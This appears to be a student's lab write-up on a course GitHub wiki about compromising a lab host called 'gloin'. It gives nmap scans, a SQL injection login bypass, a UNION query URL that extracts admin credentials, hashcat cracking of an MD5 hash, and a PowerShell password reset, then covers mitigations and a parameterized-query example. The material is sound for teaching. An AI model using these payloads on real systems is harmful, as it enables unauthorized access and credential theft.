Lab 9.2 Exploiting Gloin - zacharylongo/Tech-Journals GitHub Wiki

During this lab I utilized SQL injection to exploit "gloin" (10.0.5.31).

Notes / Steps taken

Firstly, I used the "dns-resolver" script that we previously used to get the IP address for "gloin".

I used `/ndns-rsolver.sh 10.0.5 10.0.5.22`

Then I used nmap to perform a base scan of the target and then a deeper scan on ports 22, 443, and 3389.

`sudo nmap 10.0.5.31`

`sudo nmap 10.0.5.31 -p 22,443,3389 -A`

  • Navigating to the address (knowing the web port is open) brings up the web application.

  • After experimenting for a while in the "reference code" field, I realized that I could cause an error using several characters (such as `'`).

  • This, in turn, clued me in that the box was likely vulnerable to SQL injection.

Using the Firefox network management feature, I was able to view the raw error message.

  • The computer seems to be using a C: drive; this likely means the host is running Windows.

  • With a hint from a past student, I was able to figure out that the application's source code was publicly available; with this I derived admin credentials.

**INSERTED INTO THE USERNAME FIELD (PASSWORD FIELD BUT MUST CONTAIN SOMETHING!!!)**: `1' OR 1=1 --`

Utilizing SQL injection, I was able to skate past authentication and gain full access to the admin login page.

Using further SQL injection and UNION commands, I was able to find the number of columns in the database. After this, I searched for a .db file. Assumedly, there was one:

  • With some major help from the aforementioned prior student, I gained knowledge of this exploit which allowed me to gain access to the tables.

Using the same exploit, I was now able to get the admin username and hashed password.

**EXPLOIT**: `https://10.0.5.31/entrance_exam/take_exam.php?id=%27+UNION+SELECT+1,username||%27;%27||password,3,4,5,6,7+FROM+admin_list;`

  • I then used hash-identifier to crack the hash, which turned out to be MD5.

  • Using the rockyou.txt wordlist and `hashcat -m 0 4214db3884e9cd913b49b5b44e49ae96 /usr/share/wordlists/rockyou.txt`, then `--show`, I found the following:

  • I was then able to log in:

  • Under users, I noticed the gloin user:

  • I then used PowerShell commands to change the password, and also ran this:

`Set-LocalUser -Name gloin -Password $password -Verbose`

I was then able to log in as gloin 😈

How do we mitigate these vulnerabilities?

  • **No reused passwords**: There should have been no reason for the portal and the web app to share a password. Simplest best practice ever created.

  • **Utilize prepared statements (and parameters for queries)**: Developers should use prepared statements with parameterized queries, so that user input is bound as data and cannot change the intent of a database query regardless of what SQL is inserted.
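
As an added illustration of this mitigation (example code written for this page, not from the lab's application): a Python/sqlite3 stand-in for the writeup's `admin_list` table, with a string-built login query next to a parameterized one. The table and column names come from the page; the rows, the function names and the in-memory database are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the lab's admin_list table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE admin_list (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    # Made-up row; the real app stored an MD5 hash rather than plaintext.
    conn.execute(
        "INSERT INTO admin_list (username, password) VALUES ('admin', 'correct-horse')"
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: user input becomes part of the SQL text itself.
    A username of 1' OR 1=1 -- turns the WHERE clause into a tautology and
    comments out the password check, so the first row is returned."""
    query = (
        "SELECT username FROM admin_list WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_prepared(conn, username, password):
    """Parameterized query: the driver binds the values as data, so a quote
    or comment sequence in the input can never alter the query's structure."""
    query = "SELECT username FROM admin_list WHERE username = ? AND password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None


def raises_on_quote(conn, login_fn):
    """The writeup's first clue was an error from a lone quote; this reports
    whether a login function leaks that database error for a bare ' input."""
    try:
        login_fn(conn, "'", "x")
    except sqlite3.OperationalError:
        return True
    return False
```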

Reflection

  • This lab was extremely difficult, and I would likely have found myself stuck without help. My recon was sorely lacking, and I didn't utilize searchsploit until after a classmate had told me. Using searchsploit I easily could have found a suitable exploit without endlessly trying alternate methods. In the future this will be a must.

  • At the beginning of the lab I decided to try and make another DNS script instead of using the one I had made prior. Mistakes in syntax cost me a great amount of time starting up. Additionally, after using my script, I realized I hadn't provided usage information or well-documented annotations, which made its application difficult (albeit less so than working from scratch).